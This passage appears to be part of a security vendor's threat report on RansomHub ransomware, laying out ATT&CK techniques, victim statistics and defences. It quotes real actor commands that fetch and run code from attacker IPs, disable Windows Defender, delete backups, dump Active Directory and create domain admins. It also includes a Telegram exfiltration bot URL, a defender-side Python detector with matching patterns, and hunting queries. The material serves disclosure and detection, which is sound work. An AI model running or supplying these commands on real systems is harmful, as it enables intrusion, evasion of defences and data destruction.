In the previously mentioned February 2025 incident, a PowerShell script named 111.ps1 was used to execute diskpart's clean all command.

T1059.006 - Command and Scripting Interpreter: Python
The group also dropped the Python scripts vcruntime140.py and vcruntime140d.py, which establish persistence by placing malicious files in the user's Startup folder so that they run at the next logon.

T1059.003 - Command and Scripting Interpreter: Windows Command Shell
The group used a batch file disguised as a CrowdStrike uninstall script to transfer tools, uninstall CrowdStrike and Apex One agents, and execute the ransomware payload.

Our investigation of the February 2025 incident showed that a batch file named g.bat was created which was used to perform disk wiping on the victim's machine.

T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
The group used the Python scripts vcruntime140.py and vcruntime140d.py, which establish persistence by placing malicious files in the user's Startup folder so that they run at the next logon:
startup_folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')

T1136.002 - Create Account: Domain Account
In our investigation of another RansomHub incident from January 2025, the group executed commands to create a domain user, add it to the highly privileged Domain Admins group, and redirect output to temporary files for stealth.
cmd.exe /Q /c net user {redacted} ***** /add /domain && net group "Domain Admins" {redacted} /add /domain 1> \Windows\Temp\GWncLS 2>&1

T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL
The ransomware group used a batch file named tdsskiller.bat to modify the Windows registry, setting the Winlogon Shell value to explorer.exe with the following command:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe" /f

T1484.001 - Domain or Tenant Policy Modification: Group Policy Modification
The group was also observed to use a Group Policy Object to deploy batch scripts for tool transfer, defense evasion, and ransomware deployment. Given that the malware is placed within the Group Policy infrastructure, it's possible that the attacker has tampered with Group Policy settings or scripts to include the malicious payload.

In one instance of a RansomHub infection in March 2025 that we investigated, a PowerShell command was executed to refresh and apply all Group Policy settings immediately:
cmd.exe /Q /c PowerShell.exe -noni -nop -w 1 -enc IABnAHAAdQBwAGQAYQB0AGUAIAAvAGYAbwByAGMAZQA= ^> {redacted} 2^>^&1 > C:\WINDOWS\TEMP\IKAlEd.bat & C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\IKAlEd.bat & C:\WINDOWS\system32\cmd.exe /Q /c del C:\WINDOWS\TEMP\IKAlEd.bat

T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
In the RansomHub incident in January 2025, the group was able to drop the ransomware binary using explorer.exe with the NOUACCHECK parameter.

T1564.003 - Hide Artifacts: Hidden Window
The threat actors used the Python scripts named vcruntime140.py and vcruntime140d.py, which create a batch file with obfuscated commands to execute a Python script (vcruntime140.py) using PowerShell, bypassing execution policies and hiding the PowerShell window.

T1564.003 - File/Path Exclusions
The group executed a PowerShell script that retrieves all drives with free space, adds them to Windows Defender's exclusion list to prevent them from being scanned, and displays the excluded drives.
C:\windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "$drives = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Free -gt 0 } | Select-Object -ExpandProperty Root foreach ($drive in $drives) { Add-MpPreference -ExclusionPath $drive } Write-Host 'The following drives have been added to Windows Defender exclusions:' Write-Host $drives"

T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File
RansomHub employed Base64 and Base85 encoding and zlib compression to obfuscate files. They used an encrypted NODESTEALER file to download an encrypted XWORM file, which then retrieves Base64-encoded XWORM shellcode from GitHub.

T1620 - Reflective Code Loading
The XWORM payload loads the shellcode XClientXB.b64 into memory using the VirtualAlloc, RtlMoveMemory, CreateRemoteThread, and WaitForSingleObject APIs. The code allocates memory with VirtualAlloc and copies the Base64-decoded data into that buffer (buf) with RtlMoveMemory, potentially leading to the execution of remote code.

T1562.001 - Impair Defenses: Disable or Modify Tools
The group executed scu.exe and CsUninstallTool.exe to uninstall Apex One agents and CrowdStrike, respectively.
rmdir /s C:\Temp\7597ed8d2925998a62a3281e938eaf02 /Q
start "" "C:\CS-RM\scu.exe" -noinstall
pushd "C:\CS-RM"
start "" "C:\CS-RM\CsUninstallTool.exe" /quiet


In the January 2025 incident, the group used Deployment Imaging Service and Management Tool (DISM) in Windows to disable and remove the Windows Defender feature.

C:\Windows\System32\Dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet

The group also executed a batch file named trendmicro pass AV remove.bat detected as Trojan.BAT.KILLAV.WLDY to uninstall Trend Micro anti-virus software.

Add-MpPreference -ExclusionPath C:\, C:\*
Add-MpPreference -ExclusionExtension ".exe", ".ps1", ".dll"
Set-MpPreference -DisableRealtimeMonitoring $true
add "HKLM\SOFTWARE\Wow6432Node\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc." /v "Allow Uninstall" /t REG_DWORD /d 1 /f

The ransomware group used tdsskiller.bat to execute TDSSKiller.exe.

The group also used a batch script file named 232.bat to disable real-time monitoring for Windows Defender through the following command:

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

T1112 - Modify Registry
In the January 2025 incident, the group used PsExec to add a registry entry to allow remote desktop connections.

cmd.exe /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

In one instance of a RansomHub infection in March 2025, a PowerShell script was executed to modify the Windows registry and set the DisableRestrictedAdmin value to 0, which enables Restricted Admin mode.

C:\Windows\System32\cmd.exe /Q /c echo powershell.exe -noni -nop -w 1 -enc IAByAGUAZwAgAGEAZABkACAAJwBIAEsATABNAFwAUwB5AHMAdABlAG0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwATABzAGEAJwAgAC8AdgAgAEQAaQBzAGEAYgBsAGUAUgBlAHMAdAByAGkAYwB0AGUAZABBAGQAbQBpAG4AIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYA ^> {redacted} 2^>^&1 > C:\WINDOWS\TEMP\dqbpKU.bat & C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\dqbpKU.bat & C:\WINDOWS\system32\cmd.exe /Q /c del C:\WINDOWS\TEMP\dqbpKU.bat


The ransomware used LogDel.bat to modify the registry by altering Remote Desktop Protocol (RDP) settings to facilitate unauthorized remote access.

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers">
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f>
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f


T1027.009 - Obfuscated Files or Information: Embedded Payloads
In one instance of a RansomHub infection in December 2024, the batch file named 4f6qsy.bat, detected as Backdoor.PS1.XWORM.YXELSZ, is obfuscated and carries multiple embedded AES-encrypted payloads. The batch file decrypts the payloads with AES and decompresses them with GZip.

T1620 - Reflective Code Loading
In the December 2024 RansomHub infection, the batch file named 4f6qsy.bat, detected as Backdoor.PS1.XWORM.YXELSZ, loaded the decrypted and decompressed data dynamically into memory without writing it to disk. The executed payloads are used to bypass AMSI and to decrypt and execute XWORM.


T1003.003 - OS Credential Dumping: NTDS
In the January 2025 incident, the group utilized the ntdsutil utility, a command-line tool in Windows, to create a backup of the Active Directory (AD) database by executing these commands:

cmd.exe /Q /c powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\173582116' q q" 1> \Windows\Temp\vDqwLY 2>&1

T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
The ransomware binary uses the Process32FirstW and Process32NextW APIs to enumerate running processes and terminate those listed in the kill_processes entry of its configuration.
ping -n 5 8.8.8.8

T1087.001 - Account Discovery: Local Account
In the January 2025 incident, the group used net.exe to retrieve account information from specific users.

In the RansomHub infection from December 2024, a batch file named mv.bat was executed using PsExec, which was used to list all members of the Administrators group in the domain using the following commands:
net localgroup /domain Administrators

T1087.002 - Account Discovery: Domain Account
In the December 2024 RansomHub infection, the batch file named mv.bat was also executed using PsExec to list all members of the Domain Admins and Enterprise Admins groups using the following commands:
net group /domain "Domain Admins" & net group /domain "Enterprise Admins"

T1082 - System Information Discovery
In the January 2025 incident, the group used PsExec to remotely execute wmic to retrieve a list of installed software and their versions.

Meanwhile, in the incident in February 2025, a batch script named h.bat was used to execute WMIC.exe and enumerate logical disk drives using the following command:
wmic logicaldisk get deviceid

The same batch script was also used to extract credentials, system information, or file paths by filtering output with the command findstr ":".

T1003.008 - System Information Discovery: Disk and Volume Enumeration
In an incident in February 2025, a batch script named h.bat was used to display all available disk volumes on the system using the following command:
C:\Windows\system32\cmd.exe /S /D /c" ( echo list volume )"

T1033 - System Owner/User Discovery
In the RansomHub infection from December 2024, a batch file named mv.bat was executed using PsExec to retrieve user information with the built-in Windows utilities hostname and whoami.

T1482 - Domain Trust Discovery
In the RansomHub infection in December 2024, the batch file named mv.bat was also executed using PsExec to list all domain controllers in the network using the following command:
nltest /dclist:

T1021.002 - Remote Services: SMB/Windows Admin Shares
In the January 2025 RansomHub incident, the threat group utilized PsExec to run PowerShell commands designed to download anydesk.exe.

powershell -c Start-BitsTransfer -Source hxxps://download[.]anydesk.com/AnyDesk.exe -Destination C:\ProgramData\AnyDesk.exe

T1021.001 - Remote Services: Remote Desktop Protocol
In the RansomHub infection in December 2024, a Remote Desktop Connection was initiated with the following command line on the endpoint where the XWORM malware was executed, which allows the threat actor to connect to a remote computer as an administrator:

C:\Windows\system32\mstsc.exe /admin

T1005 - Data from Local System
Based on external reports, the ransomware group uses SFTP to transfer the encryptor.

T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
The group was observed using MEGA Cloud to exfiltrate files. Based on external reports, the group created a virtual machine (VM) within the ESXi environment, evading security tools like endpoint detection and response (EDR). Once established, the threat actor exfiltrated several gigabytes of data, transferring it from their VM to an IP address owned by Mega Cloud.

T1105 - Ingress Tool Transfer
The RansomHub group utilized PowerShell scripts, batch files, and Python scripts to download ransomware precursor files from GitHub and Dropbox links:

  • WinHelper.ps1 downloads a PowerShell file from a GitHub repository:
(New-Object System[.]Net[.]WebClient).DoWnloAdString('hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/powershell/refs/heads/main/x[.]ps1')
  • x.ps1 downloads a ZIP file from a Dropbox link and saves it as WinHelper.zip in C:\WinExplorer\.
  • x.ps1 also downloads and executes a remote script from hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/sp02/refs/heads/main/s



In the RansomHub infection last December 2024 that we investigated, a file named Opartor.exe connected to hxxps[://]files[.]catbox[.]moe/4f6qsy[.]bat to download and execute a batch file named 4f6qsy.bat detected as Backdoor.PS1.XWORM.YXELSZ.

In the March 2025 RansomHub infection, a PowerShell command was executed, which downloads a file from hxxp[://]77[.]239[.]96[.]6:80/update, saves it to a temporary location, reads its contents, deletes the temp file, and executes the downloaded file (m1.dll). It runs these operations within a background job using the BitsTransfer module:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'hxxp://77[.]239.96[.]6:80/update' -Destination $d; $t = [IO.File]::ReadAllText($d); Remove-Item $d; IEX $t } -Argument 0 | wait-job | Receive-Job"

In the same March 2025 instance of a RansomHub infection, a PowerShell command was executed that downloads and runs a script from hxxp://94[.]159[.]113[.]64/x.jpg. It assembles the download call from string fragments, creates a WebClient object, downloads the script from the URL, and executes it using Invoke-Expression.
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $F5='ject Net.WebCli';$F8='loadString(''hxxp://94[.]159[.]113[.]64/x.jpg'')';$F4='ent).Down';$F1='(New-Ob';$TC=IEX ($F1,$F5,$F4,$F8 -Join '')|IEX

The group used the robocopy command-line file transfer utility to copy files from a shared network location to a local directory.

The group also used the copy command-line file transfer utility to copy the archived ransomware payload from the network location to a local directory. It then unzips the password protected archive file using unzip.exe with the password D3f@ult.

T1219 - Remote Access Software
In the December 2024 instance of a RansomHub infection that involved XWORM, a rogue ScreenConnect/ConnectWise Remote Monitoring and Management (RMM) tool was seen connecting to a malicious URL (hxxp://web[.]opcortos[.]site/).

T1102.002 - Web Service: Bidirectional Communication
Once loaded in memory, XClientXB.b64 sends a message to a Telegram bot to send the gathered information.

Telegram Bot: hxxps[://]api[.]telegram[.]org/bot5867862670:AAHp7ECfsTluhMCJC4Vl2YYZCQDdUtQ-o18/sendMessage?chat_id=-4185548654&text={Gathered Information}

Information sent:
☠ [XWorm V5.2]
New Client: {Client ID}
UserName: {User Name}
OSFullName: {OS Version}
USB: {True or False}
CPU: {Processor Information}
GPU: {GPU Information}
RAM: {RAM}
Group: XWorm V5.2

T1071.001 - Application Layer Protocol: Web Protocols
The XWORM payload connects to 42[.]96[.]11[.]54:25209 and may have retrieved a plugin from the C&C server for encryption purposes.

T1531 - Account Access Removal
In an incident in January 2025 that we investigated, the threat group attempted to reset an account's password.

T1490 - Inhibit System Recovery
The file b.bat, detected as Trojan.BAT.ZEPPELIN.SMYXBEU.hp, was used to delete system backups and shadow copies:

wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
wbadmin DELETE BACKUP -keepVersions:0
wmic SHADOWCOPY DELETE
vssadmin Delete Shadows /All /Quiet
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin list shadows


In the February 2025 incident that we investigated, a PowerShell script was executed to set a boot password in the system's BIOS/UEFI, enable BitLocker pre-boot authentication, and restart the system.

T1561.001 - Disk Wipe: Disk Content Wipe
In the February 2025 incident, a batch script named g.bat executed the command cipher /w:{drive} to securely overwrite the free space on the specified drive, rendering previously deleted files unrecoverable.

In the same incident, a PowerShell script named 111.ps1 was used to identify all non-system disks and securely wipe them using diskpart. It first lists the disks and asks for user confirmation before proceeding. Each selected disk is erased using the clean all command, ensuring complete data removal while preserving the system disk.

Another PowerShell script used in the February 2025 incident identifies all non-system disks and securely wipes them in parallel using diskpart. It first lists the disks and warns the user before proceeding. Each disk is erased with the clean all command inside a background job, so multiple disks are wiped simultaneously; progress can be tracked with Get-Job and Wait-Job.

T1489 - Service Stop
The ransomware used tdsskiller.bat to execute the taskkill command to force-terminate processes and services.

taskkill /F /fi "IMAGENAME eq {*" /im *

T1486 - Data Encrypted for Impact
Based on external reports, the attacker sent a Microsoft Teams message from the compromised domain admin account, containing an Onion link for the ransom demand.

The same report mentions that the group also used VeraCrypt, an open-source disk encryption tool, to encrypt a local data backup server, and Cohesity, an enterprise data backup and security solution, to delete storage accounts.

T1529 - System Shutdown/Reboot
In one instance of a RansomHub infection in March 2025, a PowerShell command was executed to immediately restart the computer, forcibly closing any running applications without warning.

cmd.exe /Q /c echo powershell.exe -noni -nop -w 1 -enc IABTAGgAdQB0AGQAbwB3AG4AIAAtAHIAIAAtAHQAIAAwACAALQBmAA ^> {redacted} 2^>^&1 > C:\WINDOWS\TEMP\vgFHtX.bat & C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\vgFHtX.bat & C:\WINDOWS\system32\cmd.exe /Q /c del C:\WINDOWS\TEMP\vgFHtX.bat
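As an added, defender-side example (not code from this report or from Trend Micro), the following Python helper decodes the -enc PowerShell wrappers quoted in the T1484.001, T1112 and T1529 sections above and tags process command lines that match the defense-evasion, recovery-inhibition and reboot commands listed throughout this section. The process records are constructed samples rather than telemetry, and the rule table and the triage() function are this example's own.

```python
import base64
import re
from typing import List, Optional, Tuple

# Constructed sample process-creation records (not telemetry from the report).
# The -enc blobs are the ones quoted in the T1484.001, T1112 and T1529 sections.
SAMPLE_EVENTS = [
    r"cmd.exe /Q /c PowerShell.exe -noni -nop -w 1 -enc IABnAHAAdQBwAGQAYQB0AGUAIAAvAGYAbwByAGMAZQA= > C:\WINDOWS\TEMP\IKAlEd.bat",
    r"cmd.exe /Q /c echo powershell.exe -noni -nop -w 1 -enc IABTAGgAdQB0AGQAbwB3AG4AIAAtAHIAIAAtAHQAIAAwACAALQBmAA > C:\WINDOWS\TEMP\vgFHtX.bat",
    r"cmd.exe /Q /c echo powershell.exe -noni -nop -w 1 -enc IAByAGUAZwAgAGEAZABkACAAJwBIAEsATABNAFwAUwB5AHMAdABlAG0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwATABzAGEAJwAgAC8AdgAgAEQAaQBzAGEAYgBsAGUAUgBlAHMAdAByAGkAYwB0AGUAZABBAGQAbQBpAG4AIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYA > C:\WINDOWS\TEMP\dqbpKU.bat",
    r'cmd.exe /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"',
    r"C:\Windows\System32\Dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet",
    r"vssadmin Delete Shadows /All /Quiet",
    r"C:\Windows\System32\Dism.exe /online /Get-Features",  # benign control record
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand; the samples above use -enc.
ENC_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind a -enc argument, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # restore padding the actor left off
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# (technique, description, pattern) triples derived from the commands in this section.
RULES: List[Tuple[str, str, re.Pattern]] = [
    ("T1564.003", "PowerShell launched with a hidden window",
     re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)),
    ("T1484.001", "forced Group Policy refresh",
     re.compile(r"gpupdate\s+/force", re.I)),
    ("T1112", "RDP enabled by setting fDenyTSConnections to 0",
     re.compile(r"fDenyTSConnections\s.*?/d\s+0\b", re.I)),
    ("T1112", "Restricted Admin mode enabled by setting DisableRestrictedAdmin to 0",
     re.compile(r"DisableRestrictedAdmin\s.*?/d\s+0\b", re.I)),
    ("T1562.001", "Defender real-time monitoring disabled",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("T1562.001", "Defender exclusion added",
     re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Extension)", re.I)),
    ("T1562.001", "Defender feature removed with DISM",
     re.compile(r"dism(?:\.exe)?\s.*?/Disable-Feature\s.*?Windows-Defender", re.I)),
    ("T1490", "backups or shadow copies deleted",
     re.compile(r"vssadmin\s+delete\s+shadows|wmic\s+shadowcopy\s+delete|wbadmin\s+delete", re.I)),
    ("T1490", "boot recovery disabled",
     re.compile(r"bcdedit\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("T1003.003", "NTDS copied with ntdsutil ifm",
     re.compile(r"ntdsutil.*?\bifm\b.*?create\s+full", re.I)),
    ("T1529", "forced immediate reboot",
     re.compile(r"shutdown\s+-r\s+-t\s+0\s+-f", re.I)),
]


def triage(cmdline: str) -> dict:
    """Decode any -enc payload and match raw plus decoded text against RULES."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [(tech, desc) for tech, desc, pat in RULES if pat.search(haystack)]
    return {"cmdline": cmdline, "decoded": decoded, "hits": hits}


def techniques(cmdline: str) -> set:
    """Set of ATT&CK technique IDs that a command line triggers."""
    return {tech for tech, _ in triage(cmdline)["hits"]}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = triage(ev)
        print(("ALERT " if r["hits"] else "ok    ") + ev[:72])
        if r["decoded"]:
            print("       decoded: " + r["decoded"].strip())
        for tech, desc in r["hits"]:
            print(f"       {tech}: {desc}")
```

The -enc strings are matched after decoding, so a rule written against the plain command (gpupdate /force, reg add ... DisableRestrictedAdmin, shutdown -r -t 0 -f) fires whether the actor encoded it or not.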

Summary of malware, tools, and exploits used

Table 1 summarizes the malware, techniques, and tools used by RansomHub actors in the initial infection chain that we first observed.

Tactic columns: Execution, Privilege Escalation, Credential Access, Lateral Movement, Discovery, Command and Control, Defense Evasion, Exfiltration, Impact
  • PsExec
  • CVE-2020-1472
  • MIMIKATZ
  • LaZagne
  • CVE-2023-27532
  • SecretServerSecretStealer
  • Veeamp
  • SMB Spreader
  • NetScan
  • Advanced Port Scanner
  • Atera
  • Splashtop
  • AnyDesk
  • Ngrok
  • Remmina
  • ConnectWise Screen Connect
  • POORTRY 
  • STONESTOP
  • TOGGLEDEFENDER
  • TDSSKiller
  • EDR Kill Shifter
  • IOBit Unlocker
  • RClone
  • RansomHub Ransomware

Table 1. Malware, techniques, and tools used in the RansomHub initial infection chain

Table 2 lists the malware and tools used in the RansomHub infection chains that use NODESTEALER, XWORM, and a modified Secure Common Uninstall Tool (SCUT).

Tactic columns: Initial Access, Execution, Privilege Escalation, Credential Access, Discovery, Command and Control, Defense Evasion, Exfiltration, Impact
  • SocGholish
  • WinHelper.ps1
  • x.ps1
  • vcruntime.py
  • PowerRun
  • NODESTEALER
  • nbtscan
  • XWORM
  • COBEACON
  • Python SOCKS5 Proxy Client
  • Betruger
  • Configure-SMRemoting
  • Modified Secure Common Uninstall Tool (SCUT)
  • AMSI Bypass Patcher
  • Deployment Imaging Service and Management Tool (DISM)
  • GMER
  • Uninstall-CS-ISG.bat
  • MEGAsync
  • VeraCrypt

Table 2. Malware, techniques, and tools used in the RansomHub initial infections from November 2024 that used NODESTEALER, XWORM, and a modified Secure Common Uninstall Tool (SCUT)

Top affected countries and industries from Trend Micro threat intelligence

In this section, we outline the activity of both the RansomHub ransomware and the Knight ransomware, as investigations suggest that the two are related. RansomHub was first reported in February 2024, but the first attempted attack on Trend Micro-covered systems was in April 2024. The Knight ransomware, on the other hand, has been active since January 2024, when we began tracking it in our telemetry. Although RansomHub was reportedly declared inactive in April after the DragonForce takeover, Trend telemetry counted detections until July, when our endpoint sensors identified detection names connected to RansomHub.

Figure 4. A monthly breakdown of attempted attacks from Knight ransomware and RansomHub ransomware (January 2024 to July 2025)

Knight ransomware’s top targeted countries include Brazil, Türkiye, the United States, Ireland, and Israel, while RansomHub focused their efforts in targeting enterprises from the United States and Malaysia. Note that the country data for RansomHub and Knight ransomware do not include October 2024 to February 2025 detections due to a retention limitation in our telemetry at the time of writing. Figure 3 will be updated once more data is available.

Figure 5. A breakdown of the top countries targeted by the Knight and RansomHub ransomware groups (January to September 2024, April to July 2025)

While many customers chose not to specify the industry to which they belong, data from those that did reveals that Knight ransomware targeted financial institutions the most, while RansomHub ransomware targeted the education sector the most. Note that the industry data for RansomHub and Knight ransomware do not include detections from October 2024 to February 2025 due to a retention limitation in our telemetry at the time of writing. Figure 3 will be updated once more data is available.

Figure 6. A breakdown of the top industries targeted by the Knight and RansomHub ransomware groups (January – September 2024, April to July 2025)

Targeted regions and industries according to RansomHub ransomware’s leak site

This section looks at data based on attacks recorded on the leak site of the RansomHub ransomware and a combination of our open-source intelligence (OSINT) research and an investigation from February 2024 to March 2025.


The gang has so far added at least 748 victims to its leak site, but the actual victim count is likely higher.

Of the total number of revealed victims, the RansomHub ransomware targeted enterprises in the North American region the most.  

Figure 7. The distribution by region of the RansomHub ransomware’s victim organizations, excluding victims with unknown locations
Sources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)

RansomHub targeted enterprises in the United States the most. The gang launched attacks on other countries fewer times, but its total of 748 victims comes from a wide range of at least 75 countries.

Figure 8. The top 10 countries targeted by the RansomHub ransomware
Sources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)

The majority of the RansomHub ransomware’s victim organizations were small businesses. The gang targeted medium businesses 65 times and large enterprises only 38 times.

Figure 9. The distribution by organization size of RansomHub’s victim organizations
Sources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)

RansomHub shows no strong preference for any one sector, as its victimology by industry is spread out across sectors; however, the sector with the most attacks recorded on its leak site is IT.

Figure 10. A breakdown of the top 10 industries targeted by RansomHub ransomware attacks
Sources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)


Trend Micro Vision One Threat Intelligence

To stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.

Trend Micro Vision One Intelligence Reports App [IOC Sweeping]

The following can be searched in the Trend Vision One Intelligence Reports dashboard for IOC sweeping:

  • RansomHub Attacks Surge: New Anti-EDR Tactics Unveiled and AMADEY Infrastructure Connection
  • [Hot Threats]: New Indicators for RANSOMHUB Ransomware
  • New RansomHub attack uses TDSKiller and LaZagne, disables EDR
  • StopRansomware: RansomHub Ransomware

Trend Micro Vision One Threat Insights App


Trend Vision One Hunting Query

Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this feature with data in their environment.

  • RansomHub Ransomware VSAPI Detections and Ransom Note:
malName:(*RANSOMHUB* or *KNIGHT*) AND eventName: MALWARE_DETECTION AND FileFullPath:("*\\README_*")  
  • RansomHub Ransomware Process Execution:
processCmd:"/*cmd.exe /c iisreset.exe /stop*/" AND processCmd:"*powershell.exe -Command PowerShell -Command "\"Get-CimInstance Win32_ShadowCopy | Remove-CimInstance\""*/" AND processCmd:"*powershell.exe -Command PowerShell -Command "\"Get-VM | Stop-VM -Force\""*/"  

More hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.

Recommendations

RansomHub ransomware is the latest evidence that cybercriminals readily respawn and work together with other groups to maximize profits from their extortion schemes. Its links to the people behind BlackCat and Knight ransomware make it a formidable threat worth watching out for, especially as the group’s victimology in less than a year of activity suggests frequent and aggressive attacks.


To protect systems against RansomHub ransomware and other similar threats, organizations can implement security frameworks that allocate resources systematically to establish a strong defense strategy.


The following are some best practices that organizations can consider to help protect themselves from ransomware infections:


Audit and inventory

  • Take an inventory of assets and data 
  • Identify authorized and unauthorized devices and software 
  • Make an audit of event and incident logs 

Configure and monitor

  • Manage hardware and software configurations 
  • Grant admin privileges and access only when necessary to an employee’s role 
  • Monitor network ports, protocols, and services 
  • Activate security configurations on network infrastructure devices such as firewalls and routers 
  • Establish a software allow list that only executes legitimate applications 

Patch and update

  • Conduct regular vulnerability assessments
  • Perform patching or virtual patching for operating systems and applications 
  • Update software and applications to their latest versions 

Protect and recover

  • Implement data protection, backup, and recovery measures 
  • Enable multifactor authentication (MFA) 

Secure and defend

  • Employ sandbox analysis to block malicious emails 
  • Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network 
  • Detect early signs of an attack such as the presence of suspicious tools in the system 
  • Use advanced detection technologies such as those powered by AI and machine learning

Train and test

  • Regularly train and assess employees on security skills 
  • Conduct red-team exercises and penetration tests

A multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior could help protect enterprises.

    • Trend Vision One™ – Endpoint Security provides multilayered prevention and protection capabilities across every stage of the attack chain. Industry-leading intrusion prevention helps mitigate known but unpatched threats and block questionable behavior and tools early on, before the ransomware can do irreversible damage to the system. It predicts whether files are malicious and detects indicators of attack before they get a chance to execute.
    • Trend Vision One™ – Cloud Security provides advanced server security for physical, virtual, and cloud servers through file integrity monitoring, server intrusion prevention, and container security. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching.
    • Trend Vision One™ – Email and Collaboration Security monitors employee risk levels in real time with email user risk assessments, swiftly detects and responds to user-targeted threats, and implements email security and prevention measures to disrupt the attack chain and effectively mitigate risk.